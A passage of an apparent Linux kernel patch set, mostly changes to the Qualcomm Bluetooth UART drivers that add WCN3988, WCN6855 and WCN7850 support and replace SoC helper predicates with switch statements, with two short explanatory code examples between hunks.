+ 		 kvm_arch_has_assigned_device(vcpu->kvm))
+ 		mds_clear_cpu_buffers();
+diff --git a/drivers/bluetooth/btqca.c b/drivers/bluetooth/btqca.c
+index c9064d34d8308..0211f704a358b 100644
+--- a/drivers/bluetooth/btqca.c
++++ b/drivers/bluetooth/btqca.c
+@@ -152,7 +152,7 @@ static int qca_send_patch_config_cmd(struct hci_dev *hdev)
+ 	bt_dev_dbg(hdev, "QCA Patch config");
+ 
+ 	skb = __hci_cmd_sync_ev(hdev, EDL_PATCH_CMD_OPCODE, sizeof(cmd),
+-				cmd, HCI_EV_VENDOR, HCI_INIT_TIMEOUT);
++				cmd, 0, HCI_INIT_TIMEOUT);
+ 	if (IS_ERR(skb)) {
+ 		err = PTR_ERR(skb);
+ 		bt_dev_err(hdev, "Sending QCA Patch config failed (%d)", err);
+@@ -594,27 +594,48 @@ int qca_uart_setup(struct hci_dev *hdev, uint8_t baudrate,
+ 	/* Firmware files to download are based on ROM version.
+ 	 * ROM version is derived from last two bytes of soc_ver.
+ 	 */
+-	rom_ver = ((soc_ver & 0x00000f00) >> 0x04) | (soc_ver & 0x0000000f);
++	if (soc_type == QCA_WCN3988)
++		rom_ver = ((soc_ver & 0x00000f00) >> 0x05) | (soc_ver & 0x0000000f);
++	else
++		rom_ver = ((soc_ver & 0x00000f00) >> 0x04) | (soc_ver & 0x0000000f);
+ 
+ 	if (soc_type == QCA_WCN6750)
+ 		qca_send_patch_config_cmd(hdev);
+ 
+ 	/* Download rampatch file */
+ 	config.type = TLV_TYPE_PATCH;
+-	if (qca_is_wcn399x(soc_type)) {
++	switch (soc_type) {
++	case QCA_WCN3990:
++	case QCA_WCN3991:
++	case QCA_WCN3998:
+ 		snprintf(config.fwname, sizeof(config.fwname),
+ 			 "qca/crbtfw%02x.tlv", rom_ver);
+-	} else if (soc_type == QCA_QCA6390) {
++		break;
++	case QCA_WCN3988:
++		snprintf(config.fwname, sizeof(config.fwname),
++			 "qca/apbtfw%02x.tlv", rom_ver);
++		break;
++	case QCA_QCA6390:
+ 		snprintf(config.fwname, sizeof(config.fwname),
+ 			 "qca/htbtfw%02x.tlv", rom_ver);
+-	} else if (soc_type == QCA_WCN6750) {
++		break;
++	case QCA_WCN6750:
+ 		/* Choose mbn file by default. If mbn file is not found
+ 		 * then choose tlv file
+ 		 */
+ 		config.type = ELF_TYPE_PATCH;
+ 		snprintf(config.fwname, sizeof(config.fwname),
+ 			 "qca/msbtfw%02x.mbn", rom_ver);
+-	} else {
++		break;
++	case QCA_WCN6855:
++		snprintf(config.fwname, sizeof(config.fwname),
++			 "qca/hpbtfw%02x.tlv", rom_ver);
++		break;
++	case QCA_WCN7850:
++		snprintf(config.fwname, sizeof(config.fwname),
++			 "qca/hmtbtfw%02x.tlv", rom_ver);
++		break;
++	default:
+ 		snprintf(config.fwname, sizeof(config.fwname),
+ 			 "qca/rampatch_%08x.bin", soc_ver);
+ 	}
+@@ -630,27 +651,48 @@ int qca_uart_setup(struct hci_dev *hdev, uint8_t baudrate,
+ 
+ 	/* Download NVM configuration */
+ 	config.type = TLV_TYPE_NVM;
+-	if (firmware_name)
++	if (firmware_name) {
+ 		snprintf(config.fwname, sizeof(config.fwname),
+ 			 "qca/%s", firmware_name);
+-	else if (qca_is_wcn399x(soc_type)) {
+-		if (ver.soc_id == QCA_WCN3991_SOC_ID) {
++	} else {
++		switch (soc_type) {
++		case QCA_WCN3990:
++		case QCA_WCN3991:
++		case QCA_WCN3998:
++			if (le32_to_cpu(ver.soc_id) == QCA_WCN3991_SOC_ID) {
++				snprintf(config.fwname, sizeof(config.fwname),
++					 "qca/crnv%02xu.bin", rom_ver);
++			} else {
++				snprintf(config.fwname, sizeof(config.fwname),
++					 "qca/crnv%02x.bin", rom_ver);
++			}
++			break;
++		case QCA_WCN3988:
+ 			snprintf(config.fwname, sizeof(config.fwname),
+-				 "qca/crnv%02xu.bin", rom_ver);
+-		} else {
++				 "qca/apnv%02x.bin", rom_ver);
++			break;
++		case QCA_QCA6390:
++			snprintf(config.fwname, sizeof(config.fwname),
++				 "qca/htnv%02x.bin", rom_ver);
++			break;
++		case QCA_WCN6750:
+ 			snprintf(config.fwname, sizeof(config.fwname),
+-				 "qca/crnv%02x.bin", rom_ver);
++				 "qca/msnv%02x.bin", rom_ver);
++			break;
++		case QCA_WCN6855:
++			snprintf(config.fwname, sizeof(config.fwname),
++				 "qca/hpnv%02x.bin", rom_ver);
++			break;
++		case QCA_WCN7850:
++			snprintf(config.fwname, sizeof(config.fwname),
++				 "qca/hmtnv%02x.bin", rom_ver);
++			break;
++
++		default:
++			snprintf(config.fwname, sizeof(config.fwname),
++				 "qca/nvm_%08x.bin", soc_ver);
+ 		}
+ 	}
+-	else if (soc_type == QCA_QCA6390)
+-		snprintf(config.fwname, sizeof(config.fwname),
+-			 "qca/htnv%02x.bin", rom_ver);
+-	else if (soc_type == QCA_WCN6750)
+-		snprintf(config.fwname, sizeof(config.fwname),
+-			 "qca/msnv%02x.bin", rom_ver);
+-	else
+-		snprintf(config.fwname, sizeof(config.fwname),
+-			 "qca/nvm_%08x.bin", soc_ver);
+ 
+ 	err = qca_download_firmware(hdev, &config, soc_type, rom_ver);
+ 	if (err < 0) {
+@@ -658,16 +700,25 @@ int qca_uart_setup(struct hci_dev *hdev, uint8_t baudrate,
+ 		return err;
+ 	}
+ 
+-	if (soc_type >= QCA_WCN3991) {
++	switch (soc_type) {
++	case QCA_WCN3991:
++	case QCA_QCA6390:
++	case QCA_WCN6750:
++	case QCA_WCN6855:
++	case QCA_WCN7850:
+ 		err = qca_disable_soc_logging(hdev);
+ 		if (err < 0)
+ 			return err;
++		break;
++	default:
++		break;
+ 	}
+ 
+ 	/* WCN399x and WCN6750 support the Microsoft vendor extension with 0xFD70 as the
+ 	 * VsMsftOpCode.
+ 	 */
+ 	switch (soc_type) {
++	case QCA_WCN3988:
+ 	case QCA_WCN3990:
+ 	case QCA_WCN3991:
+ 	case QCA_WCN3998:
+@@ -685,11 +736,18 @@ int qca_uart_setup(struct hci_dev *hdev, uint8_t baudrate,
+ 		return err;
+ 	}
+ 
+-	if (soc_type == QCA_WCN3991 || soc_type == QCA_WCN6750) {
++	switch (soc_type) {
++	case QCA_WCN3991:
++	case QCA_WCN6750:
++	case QCA_WCN6855:
++	case QCA_WCN7850:
+ 		/* get fw build info */
+ 		err = qca_read_fw_build_info(hdev);
+ 		if (err < 0)
+ 			return err;
++		break;
++	default:
++		break;
+ 	}
+ 
+ 	bt_dev_info(hdev, "QCA setup on UART is completed");
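
A worked example of the rom_ver derivation and firmware-name selection
above, assuming a hypothetical soc_ver of 0x40020150 on a WCN6855 (a
non-WCN3988 part, so the >> 0x04 branch applies):

    u32 soc_ver = 0x40020150;  /* hypothetical */
    u8  rom_ver = ((soc_ver & 0x00000f00) >> 0x04) | (soc_ver & 0x0000000f);
    char fwname[64];

    /* (0x100 >> 4) | 0x0 = 0x10 */
    snprintf(fwname, sizeof(fwname), "qca/hpbtfw%02x.tlv", rom_ver);
    /* -> "qca/hpbtfw10.tlv" */
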
+diff --git a/drivers/bluetooth/btqca.h b/drivers/bluetooth/btqca.h
+index 61e9a50e66ae1..03bff5c0059de 100644
+--- a/drivers/bluetooth/btqca.h
++++ b/drivers/bluetooth/btqca.h
+@@ -142,11 +142,14 @@ enum qca_btsoc_type {
+ 	QCA_INVALID = -1,
+ 	QCA_AR3002,
+ 	QCA_ROME,
++	QCA_WCN3988,
+ 	QCA_WCN3990,
+ 	QCA_WCN3998,
+ 	QCA_WCN3991,
+ 	QCA_QCA6390,
+ 	QCA_WCN6750,
++	QCA_WCN6855,
++	QCA_WCN7850,
+ };
+ 
+ #if IS_ENABLED(CONFIG_BT_QCA)
+@@ -159,16 +162,6 @@ int qca_read_soc_version(struct hci_dev *hdev, struct qca_btsoc_version *ver,
+ 			 enum qca_btsoc_type);
+ int qca_set_bdaddr(struct hci_dev *hdev, const bdaddr_t *bdaddr);
+ int qca_send_pre_shutdown_cmd(struct hci_dev *hdev);
+-static inline bool qca_is_wcn399x(enum qca_btsoc_type soc_type)
+-{
+-	return soc_type == QCA_WCN3990 || soc_type == QCA_WCN3991 ||
+-	       soc_type == QCA_WCN3998;
+-}
+-static inline bool qca_is_wcn6750(enum qca_btsoc_type soc_type)
+-{
+-	return soc_type == QCA_WCN6750;
+-}
+-
+ #else
+ 
+ static inline int qca_set_bdaddr_rome(struct hci_dev *hdev, const bdaddr_t *bdaddr)
+@@ -196,16 +189,6 @@ static inline int qca_set_bdaddr(struct hci_dev *hdev, const bdaddr_t *bdaddr)
+ 	return -EOPNOTSUPP;
+ }
+ 
+-static inline bool qca_is_wcn399x(enum qca_btsoc_type soc_type)
+-{
+-	return false;
+-}
+-
+-static inline bool qca_is_wcn6750(enum qca_btsoc_type soc_type)
+-{
+-	return false;
+-}
+-
+ static inline int qca_send_pre_shutdown_cmd(struct hci_dev *hdev)
+ {
+ 	return -EOPNOTSUPP;
+diff --git a/drivers/bluetooth/hci_qca.c b/drivers/bluetooth/hci_qca.c
+index 76ceb8a0183d1..8bfef7f81b417 100644
+--- a/drivers/bluetooth/hci_qca.c
++++ b/drivers/bluetooth/hci_qca.c
+@@ -7,6 +7,7 @@
+  *
+  *  Copyright (C) 2007 Texas Instruments, Inc.
+  *  Copyright (c) 2010, 2012, 2018 The Linux Foundation. All rights reserved.
++ *  Copyright (c) 2023 Qualcomm Innovation Center, Inc. All rights reserved.
+  *
+  *  Acknowledgements:
+  *  This file is based on hci_ll.c, which was...
+@@ -606,9 +607,18 @@ static int qca_open(struct hci_uart *hu)
+ 	if (hu->serdev) {
+ 		qcadev = serdev_device_get_drvdata(hu->serdev);
+ 
+-		if (qca_is_wcn399x(qcadev->btsoc_type) ||
+-		    qca_is_wcn6750(qcadev->btsoc_type))
++		switch (qcadev->btsoc_type) {
++		case QCA_WCN3988:
++		case QCA_WCN3990:
++		case QCA_WCN3991:
++		case QCA_WCN3998:
++		case QCA_WCN6750:
+ 			hu->init_speed = qcadev->init_speed;
++			break;
++
++		default:
++			break;
++		}
+ 
+ 		if (qcadev->oper_speed)
+ 			hu->oper_speed = qcadev->oper_speed;
+@@ -1314,11 +1324,20 @@ static int qca_set_baudrate(struct hci_dev *hdev, uint8_t baudrate)
+ 		      msecs_to_jiffies(CMD_TRANS_TIMEOUT_MS));
+ 
+ 	/* Give the controller time to process the request */
+-	if (qca_is_wcn399x(qca_soc_type(hu)) ||
+-	    qca_is_wcn6750(qca_soc_type(hu)))
++	switch (qca_soc_type(hu)) {
++	case QCA_WCN3988:
++	case QCA_WCN3990:
++	case QCA_WCN3991:
++	case QCA_WCN3998:
++	case QCA_WCN6750:
++	case QCA_WCN6855:
++	case QCA_WCN7850:
+ 		usleep_range(1000, 10000);
+-	else
++		break;
++
++	default:
+ 		msleep(300);
++	}
+ 
+ 	return 0;
+ }
+@@ -1391,12 +1410,20 @@ static unsigned int qca_get_speed(struct hci_uart *hu,
+ 
+ static int qca_check_speeds(struct hci_uart *hu)
+ {
+-	if (qca_is_wcn399x(qca_soc_type(hu)) ||
+-	    qca_is_wcn6750(qca_soc_type(hu))) {
++	switch (qca_soc_type(hu)) {
++	case QCA_WCN3988:
++	case QCA_WCN3990:
++	case QCA_WCN3991:
++	case QCA_WCN3998:
++	case QCA_WCN6750:
++	case QCA_WCN6855:
++	case QCA_WCN7850:
+ 		if (!qca_get_speed(hu, QCA_INIT_SPEED) &&
+ 		    !qca_get_speed(hu, QCA_OPER_SPEED))
+ 			return -EINVAL;
+-	} else {
++		break;
++
++	default:
+ 		if (!qca_get_speed(hu, QCA_INIT_SPEED) ||
+ 		    !qca_get_speed(hu, QCA_OPER_SPEED))
+ 			return -EINVAL;
+@@ -1425,13 +1452,29 @@ static int qca_set_speed(struct hci_uart *hu, enum qca_speed_type speed_type)
+ 		/* Disable flow control for wcn3990 to deassert RTS while
+ 		 * changing the baudrate of chip and host.
+ 		 */
+-		if (qca_is_wcn399x(soc_type) ||
+-		    qca_is_wcn6750(soc_type))
++		switch (soc_type) {
++		case QCA_WCN3988:
++		case QCA_WCN3990:
++		case QCA_WCN3991:
++		case QCA_WCN3998:
++		case QCA_WCN6750:
++		case QCA_WCN6855:
++		case QCA_WCN7850:
+ 			hci_uart_set_flow_control(hu, true);
++			break;
+ 
+-		if (soc_type == QCA_WCN3990) {
++		default:
++			break;
++		}
++
++		switch (soc_type) {
++		case QCA_WCN3990:
+ 			reinit_completion(&qca->drop_ev_comp);
+ 			set_bit(QCA_DROP_VENDOR_EVENT, &qca->flags);
++			break;
++
++		default:
++			break;
+ 		}
+ 
+ 		qca_baudrate = qca_get_baudrate_value(speed);
+@@ -1443,11 +1486,23 @@ static int qca_set_speed(struct hci_uart *hu, enum qca_speed_type speed_type)
+ 		host_set_baudrate(hu, speed);
+ 
+ error:
+-		if (qca_is_wcn399x(soc_type) ||
+-		    qca_is_wcn6750(soc_type))
++		switch (soc_type) {
++		case QCA_WCN3988:
++		case QCA_WCN3990:
++		case QCA_WCN3991:
++		case QCA_WCN3998:
++		case QCA_WCN6750:
++		case QCA_WCN6855:
++		case QCA_WCN7850:
+ 			hci_uart_set_flow_control(hu, false);
++			break;
+ 
+-		if (soc_type == QCA_WCN3990) {
++		default:
++			break;
++		}
++
++		switch (soc_type) {
++		case QCA_WCN3990:
+ 			/* Wait for the controller to send the vendor event
+ 			 * for the baudrate change command.
+ 			 */
+@@ -1459,6 +1514,10 @@ static int qca_set_speed(struct hci_uart *hu, enum qca_speed_type speed_type)
+ 			}
+ 
+ 			clear_bit(QCA_DROP_VENDOR_EVENT, &qca->flags);
++			break;
++
++		default:
++			break;
+ 		}
+ 	}
+ 
+@@ -1620,12 +1679,20 @@ static int qca_regulator_init(struct hci_uart *hu)
+ 		}
+ 	}
+ 
+-	if (qca_is_wcn399x(soc_type)) {
++	switch (soc_type) {
++	case QCA_WCN3988:
++	case QCA_WCN3990:
++	case QCA_WCN3991:
++	case QCA_WCN3998:
+ 		/* Forcefully enable wcn399x to enter into boot mode. */
+ 		host_set_baudrate(hu, 2400);
+ 		ret = qca_send_power_pulse(hu, false);
+ 		if (ret)
+ 			return ret;
++		break;
++
++	default:
++		break;
+ 	}
+ 
+ 	/* For wcn6750 need to enable gpio bt_en */
+@@ -1642,10 +1709,18 @@ static int qca_regulator_init(struct hci_uart *hu)
+ 
+ 	qca_set_speed(hu, QCA_INIT_SPEED);
+ 
+-	if (qca_is_wcn399x(soc_type)) {
++	switch (soc_type) {
++	case QCA_WCN3988:
++	case QCA_WCN3990:
++	case QCA_WCN3991:
++	case QCA_WCN3998:
+ 		ret = qca_send_power_pulse(hu, true);
+ 		if (ret)
+ 			return ret;
++		break;
++
++	default:
++		break;
+ 	}
+ 
+ 	/* Now the device is in ready state to communicate with host.
+@@ -1679,10 +1754,18 @@ static int qca_power_on(struct hci_dev *hdev)
+ 	if (!hu->serdev)
+ 		return 0;
+ 
+-	if (qca_is_wcn399x(soc_type) ||
+-	    qca_is_wcn6750(soc_type)) {
++	switch (soc_type) {
++	case QCA_WCN3988:
++	case QCA_WCN3990:
++	case QCA_WCN3991:
++	case QCA_WCN3998:
++	case QCA_WCN6750:
++	case QCA_WCN6855:
++	case QCA_WCN7850:
+ 		ret = qca_regulator_init(hu);
+-	} else {
++		break;
++
++	default:
+ 		qcadev = serdev_device_get_drvdata(hu->serdev);
+ 		if (qcadev->bt_en) {
+ 			gpiod_set_value_cansleep(qcadev->bt_en, 1);
+@@ -1705,6 +1788,7 @@ static int qca_setup(struct hci_uart *hu)
+ 	const char *firmware_name = qca_get_firmware_name(hu);
+ 	int ret;
+ 	struct qca_btsoc_version ver;
++	const char *soc_name;
+ 
+ 	ret = qca_check_speeds(hu);
+ 	if (ret)
+@@ -1719,9 +1803,30 @@ static int qca_setup(struct hci_uart *hu)
+ 	 */
+ 	set_bit(HCI_QUIRK_SIMULTANEOUS_DISCOVERY, &hdev->quirks);
+ 
+-	bt_dev_info(hdev, "setting up %s",
+-		qca_is_wcn399x(soc_type) ? "wcn399x" :
+-		(soc_type == QCA_WCN6750) ? "wcn6750" : "ROME/QCA6390");
++	switch (soc_type) {
++	case QCA_WCN3988:
++	case QCA_WCN3990:
++	case QCA_WCN3991:
++	case QCA_WCN3998:
++		soc_name = "wcn399x";
++		break;
++
++	case QCA_WCN6750:
++		soc_name = "wcn6750";
++		break;
++
++	case QCA_WCN6855:
++		soc_name = "wcn6855";
++		break;
++
++	case QCA_WCN7850:
++		soc_name = "wcn7850";
++		break;
++
++	default:
++		soc_name = "ROME/QCA6390";
++	}
++	bt_dev_info(hdev, "setting up %s", soc_name);
+ 
+ 	qca->memdump_state = QCA_MEMDUMP_IDLE;
+ 
+@@ -1732,15 +1837,33 @@ static int qca_setup(struct hci_uart *hu)
+ 
+ 	clear_bit(QCA_SSR_TRIGGERED, &qca->flags);
+ 
+-	if (qca_is_wcn399x(soc_type) ||
+-	    qca_is_wcn6750(soc_type)) {
+-		set_bit(HCI_QUIRK_USE_BDADDR_PROPERTY, &hdev->quirks);
++	switch (soc_type) {
++	case QCA_WCN3988:
++	case QCA_WCN3990:
++	case QCA_WCN3991:
++	case QCA_WCN3998:
++	case QCA_WCN6750:
++	case QCA_WCN6855:
++	case QCA_WCN7850:
++
++		/* Set BDA quirk bit for reading BDA value from fwnode property
++		 * only if that property exists in DT.
++		 */
++		if (fwnode_property_present(dev_fwnode(hdev->dev.parent), "local-bd-address")) {
++			set_bit(HCI_QUIRK_USE_BDADDR_PROPERTY, &hdev->quirks);
++			bt_dev_info(hdev, "setting quirk bit to read BDA from fwnode later");
++		} else {
++			bt_dev_dbg(hdev, "local-bd-address is not present in the devicetree so not setting quirk bit for BDA");
++		}
++
+ 		hci_set_aosp_capable(hdev);
+ 
+ 		ret = qca_read_soc_version(hdev, &ver, soc_type);
+ 		if (ret)
+ 			goto out;
+-	} else {
++		break;
++
++	default:
+ 		qca_set_speed(hu, QCA_INIT_SPEED);
+ 	}
+ 
+@@ -1754,8 +1877,17 @@ static int qca_setup(struct hci_uart *hu)
+ 		qca_baudrate = qca_get_baudrate_value(speed);
+ 	}
+ 
+-	if (!(qca_is_wcn399x(soc_type) ||
+-	     qca_is_wcn6750(soc_type))) {
++	switch (soc_type) {
++	case QCA_WCN3988:
++	case QCA_WCN3990:
++	case QCA_WCN3991:
++	case QCA_WCN3998:
++	case QCA_WCN6750:
++	case QCA_WCN6855:
++	case QCA_WCN7850:
++		break;
++
++	default:
+ 		/* Get QCA version information */
+ 		ret = qca_read_soc_version(hdev, &ver, soc_type);
+ 		if (ret)
+@@ -1824,7 +1956,18 @@ static const struct hci_uart_proto qca_proto = {
+ 	.dequeue	= qca_dequeue,
+ };
+ 
+-static const struct qca_device_data qca_soc_data_wcn3990 = {
++static const struct qca_device_data qca_soc_data_wcn3988 __maybe_unused = {
++	.soc_type = QCA_WCN3988,
++	.vregs = (struct qca_vreg []) {
++		{ "vddio", 15000  },
++		{ "vddxo", 80000  },
++		{ "vddrf", 300000 },
++		{ "vddch0", 450000 },
++	},
++	.num_vregs = 4,
++};
++
++static const struct qca_device_data qca_soc_data_wcn3990 __maybe_unused = {
+ 	.soc_type = QCA_WCN3990,
+ 	.vregs = (struct qca_vreg []) {
+ 		{ "vddio", 15000  },
+@@ -1835,7 +1978,7 @@ static const struct qca_device_data qca_soc_data_wcn3990 = {
+ 	.num_vregs = 4,
+ };
+ 
+-static const struct qca_device_data qca_soc_data_wcn3991 = {
++static const struct qca_device_data qca_soc_data_wcn3991 __maybe_unused = {
+ 	.soc_type = QCA_WCN3991,
+ 	.vregs = (struct qca_vreg []) {
+ 		{ "vddio", 15000  },
+@@ -1847,7 +1990,7 @@ static const struct qca_device_data qca_soc_data_wcn3991 = {
+ 	.capabilities = QCA_CAP_WIDEBAND_SPEECH | QCA_CAP_VALID_LE_STATES,
+ };
+ 
+-static const struct qca_device_data qca_soc_data_wcn3998 = {
++static const struct qca_device_data qca_soc_data_wcn3998 __maybe_unused = {
+ 	.soc_type = QCA_WCN3998,
+ 	.vregs = (struct qca_vreg []) {
+ 		{ "vddio", 10000  },
+@@ -1858,13 +2001,13 @@ static const struct qca_device_data qca_soc_data_wcn3998 = {
+ 	.num_vregs = 4,
+ };
+ 
+-static const struct qca_device_data qca_soc_data_qca6390 = {
++static const struct qca_device_data qca_soc_data_qca6390 __maybe_unused = {
+ 	.soc_type = QCA_QCA6390,
+ 	.num_vregs = 0,
+ 	.capabilities = QCA_CAP_WIDEBAND_SPEECH | QCA_CAP_VALID_LE_STATES,
+ };
+ 
+-static const struct qca_device_data qca_soc_data_wcn6750 = {
++static const struct qca_device_data qca_soc_data_wcn6750 __maybe_unused = {
+ 	.soc_type = QCA_WCN6750,
+ 	.vregs = (struct qca_vreg []) {
+ 		{ "vddio", 5000 },
+@@ -1881,6 +2024,34 @@ static const struct qca_device_data qca_soc_data_wcn6750 = {
+ 	.capabilities = QCA_CAP_WIDEBAND_SPEECH | QCA_CAP_VALID_LE_STATES,
+ };
+ 
++static const struct qca_device_data qca_soc_data_wcn6855 = {
++	.soc_type = QCA_WCN6855,
++	.vregs = (struct qca_vreg []) {
++		{ "vddio", 5000 },
++		{ "vddbtcxmx", 126000 },
++		{ "vddrfacmn", 12500 },
++		{ "vddrfa0p8", 102000 },
++		{ "vddrfa1p7", 302000 },
++		{ "vddrfa1p2", 257000 },
++	},
++	.num_vregs = 6,
++	.capabilities = QCA_CAP_WIDEBAND_SPEECH | QCA_CAP_VALID_LE_STATES,
++};
++
++static const struct qca_device_data qca_soc_data_wcn7850 __maybe_unused = {
++	.soc_type = QCA_WCN7850,
++	.vregs = (struct qca_vreg []) {
++		{ "vddio", 5000 },
++		{ "vddaon", 26000 },
++		{ "vdddig", 126000 },
++		{ "vddrfa0p8", 102000 },
++		{ "vddrfa1p2", 257000 },
++		{ "vddrfa1p9", 302000 },
++	},
++	.num_vregs = 6,
++	.capabilities = QCA_CAP_WIDEBAND_SPEECH | QCA_CAP_VALID_LE_STATES,
++};
++
+ static void qca_power_shutdown(struct hci_uart *hu)
+ {
+ 	struct qca_serdev *qcadev;
+@@ -1906,11 +2077,18 @@ static void qca_power_shutdown(struct hci_uart *hu)
+ 
+ 	qcadev = serdev_device_get_drvdata(hu->serdev);
+ 
+-	if (qca_is_wcn399x(soc_type)) {
++	switch (soc_type) {
++	case QCA_WCN3988:
++	case QCA_WCN3990:
++	case QCA_WCN3991:
++	case QCA_WCN3998:
+ 		host_set_baudrate(hu, 2400);
+ 		qca_send_power_pulse(hu, false);
+ 		qca_regulator_disable(qcadev);
+-	} else if (soc_type == QCA_WCN6750) {
++		break;
++
++	case QCA_WCN6750:
++	case QCA_WCN6855:
+ 		gpiod_set_value_cansleep(qcadev->bt_en, 0);
+ 		msleep(100);
+ 		qca_regulator_disable(qcadev);
+@@ -1918,7 +2096,9 @@ static void qca_power_shutdown(struct hci_uart *hu)
+ 			sw_ctrl_state = gpiod_get_value_cansleep(qcadev->sw_ctrl);
+ 			bt_dev_dbg(hu->hdev, "SW_CTRL is %d", sw_ctrl_state);
+ 		}
+-	} else if (qcadev->bt_en) {
++		break;
++
++	default:
+ 		gpiod_set_value_cansleep(qcadev->bt_en, 0);
+ 	}
+ 
+@@ -2043,10 +2223,19 @@ static int qca_serdev_probe(struct serdev_device *serdev)
+ 	if (!qcadev->oper_speed)
+ 		BT_DBG("UART will pick default operating speed");
+ 
+-	if (data &&
+-	    (qca_is_wcn399x(data->soc_type) ||
+-	    qca_is_wcn6750(data->soc_type))) {
++	if (data)
+ 		qcadev->btsoc_type = data->soc_type;
++	else
++		qcadev->btsoc_type = QCA_ROME;
++
++	switch (qcadev->btsoc_type) {
++	case QCA_WCN3988:
++	case QCA_WCN3990:
++	case QCA_WCN3991:
++	case QCA_WCN3998:
++	case QCA_WCN6750:
++	case QCA_WCN6855:
++	case QCA_WCN7850:
+ 		qcadev->bt_power = devm_kzalloc(&serdev->dev,
+ 						sizeof(struct qca_power),
+ 						GFP_KERNEL);
+@@ -2065,14 +2254,19 @@ static int qca_serdev_probe(struct serdev_device *serdev)
+ 
+ 		qcadev->bt_en = devm_gpiod_get_optional(&serdev->dev, "enable",
+ 					       GPIOD_OUT_LOW);
+-		if (IS_ERR_OR_NULL(qcadev->bt_en) && data->soc_type == QCA_WCN6750) {
++		if (IS_ERR_OR_NULL(qcadev->bt_en) &&
++		    (data->soc_type == QCA_WCN6750 ||
++		     data->soc_type == QCA_WCN6855)) {
+ 			dev_err(&serdev->dev, "failed to acquire BT_EN gpio\n");
+ 			power_ctrl_enabled = false;
+ 		}
+ 
+ 		qcadev->sw_ctrl = devm_gpiod_get_optional(&serdev->dev, "swctrl",
+ 					       GPIOD_IN);
+-		if (IS_ERR_OR_NULL(qcadev->sw_ctrl) && data->soc_type == QCA_WCN6750)
++		if (IS_ERR_OR_NULL(qcadev->sw_ctrl) &&
++		    (data->soc_type == QCA_WCN6750 ||
++		     data->soc_type == QCA_WCN6855 ||
++		     data->soc_type == QCA_WCN7850))
+ 			dev_warn(&serdev->dev, "failed to acquire SW_CTRL gpio\n");
+ 
+ 		qcadev->susclk = devm_clk_get_optional(&serdev->dev, NULL);
+@@ -2086,12 +2280,9 @@ static int qca_serdev_probe(struct serdev_device *serdev)
+ 			BT_ERR("wcn3990 serdev registration failed");
+ 			return err;
+ 		}
+-	} else {
+-		if (data)
+-			qcadev->btsoc_type = data->soc_type;
+-		else
+-			qcadev->btsoc_type = QCA_ROME;
++		break;
+ 
++	default:
+ 		qcadev->bt_en = devm_gpiod_get_optional(&serdev->dev, "enable",
+ 					       GPIOD_OUT_LOW);
+ 		if (IS_ERR_OR_NULL(qcadev->bt_en)) {
+@@ -2147,12 +2338,24 @@ static void qca_serdev_remove(struct serdev_device *serdev)
+ 	struct qca_serdev *qcadev = serdev_device_get_drvdata(serdev);
+ 	struct qca_power *power = qcadev->bt_power;
+ 
+-	if ((qca_is_wcn399x(qcadev->btsoc_type) ||
+-	     qca_is_wcn6750(qcadev->btsoc_type)) &&
+-	     power->vregs_on)
+-		qca_power_shutdown(&qcadev->serdev_hu);
+-	else if (qcadev->susclk)
+-		clk_disable_unprepare(qcadev->susclk);
++	switch (qcadev->btsoc_type) {
++	case QCA_WCN3988:
++	case QCA_WCN3990:
++	case QCA_WCN3991:
++	case QCA_WCN3998:
++	case QCA_WCN6750:
++	case QCA_WCN6855:
++	case QCA_WCN7850:
++		if (power->vregs_on) {
++			qca_power_shutdown(&qcadev->serdev_hu);
++			break;
++		}
++		fallthrough;
++
++	default:
++		if (qcadev->susclk)
++			clk_disable_unprepare(qcadev->susclk);
++	}
+ 
+ 	hci_uart_unregister_device(&qcadev->serdev_hu);
+ }
+@@ -2329,10 +2532,13 @@ static const struct of_device_id qca_bluetooth_of_match[] = {
+ 	{ .compatible = "qcom,qca6174-bt" },
+ 	{ .compatible = "qcom,qca6390-bt", .data = &qca_soc_data_qca6390},
+ 	{ .compatible = "qcom,qca9377-bt" },
++	{ .compatible = "qcom,wcn3988-bt", .data = &qca_soc_data_wcn3988},
+ 	{ .compatible = "qcom,wcn3990-bt", .data = &qca_soc_data_wcn3990},
+ 	{ .compatible = "qcom,wcn3991-bt", .data = &qca_soc_data_wcn3991},
+ 	{ .compatible = "qcom,wcn3998-bt", .data = &qca_soc_data_wcn3998},
+ 	{ .compatible = "qcom,wcn6750-bt", .data = &qca_soc_data_wcn6750},
++	{ .compatible = "qcom,wcn6855-bt", .data = &qca_soc_data_wcn6855},
++	{ .compatible = "qcom,wcn7850-bt", .data = &qca_soc_data_wcn7850},
+ 	{ /* sentinel */ }
+ };
+ MODULE_DEVICE_TABLE(of, qca_bluetooth_of_match);
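
The hci_qca hunks above replace the qca_is_wcn399x()/qca_is_wcn6750() predicate helpers with explicit switch statements over the SoC enum, so supporting WCN6855 and WCN7850 reduces to adding case labels. A minimal standalone sketch of the pattern (the enum values and handler here are illustrative, not the driver's):

    #include <stdio.h>

    enum soc_type { QCA_ROME, QCA_WCN3990, QCA_WCN6750, QCA_WCN6855 };

    /* Stacked case labels group related SoCs; the default arm keeps
     * older parts on the legacy path, so new chips are one label away. */
    static const char *init_speed_source(enum soc_type t)
    {
        switch (t) {
        case QCA_WCN3990:
        case QCA_WCN6750:
        case QCA_WCN6855:
            return "firmware-defined init speed";
        default:
            return "legacy default speed";
        }
    }

    int main(void)
    {
        printf("%s\n", init_speed_source(QCA_WCN6855));
        return 0;
    }
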
+diff --git a/drivers/clk/tegra/clk-tegra20.c b/drivers/clk/tegra/clk-tegra20.c
+index 422d782475532..dcacc5064d339 100644
+--- a/drivers/clk/tegra/clk-tegra20.c
++++ b/drivers/clk/tegra/clk-tegra20.c
+@@ -21,24 +21,24 @@
+ #define MISC_CLK_ENB 0x48
+ 
+ #define OSC_CTRL 0x50
+-#define OSC_CTRL_OSC_FREQ_MASK (3<<30)
+-#define OSC_CTRL_OSC_FREQ_13MHZ (0<<30)
+-#define OSC_CTRL_OSC_FREQ_19_2MHZ (1<<30)
+-#define OSC_CTRL_OSC_FREQ_12MHZ (2<<30)
+-#define OSC_CTRL_OSC_FREQ_26MHZ (3<<30)
+-#define OSC_CTRL_MASK (0x3f2 | OSC_CTRL_OSC_FREQ_MASK)
+-
+-#define OSC_CTRL_PLL_REF_DIV_MASK (3<<28)
+-#define OSC_CTRL_PLL_REF_DIV_1		(0<<28)
+-#define OSC_CTRL_PLL_REF_DIV_2		(1<<28)
+-#define OSC_CTRL_PLL_REF_DIV_4		(2<<28)
++#define OSC_CTRL_OSC_FREQ_MASK (3u<<30)
++#define OSC_CTRL_OSC_FREQ_13MHZ (0u<<30)
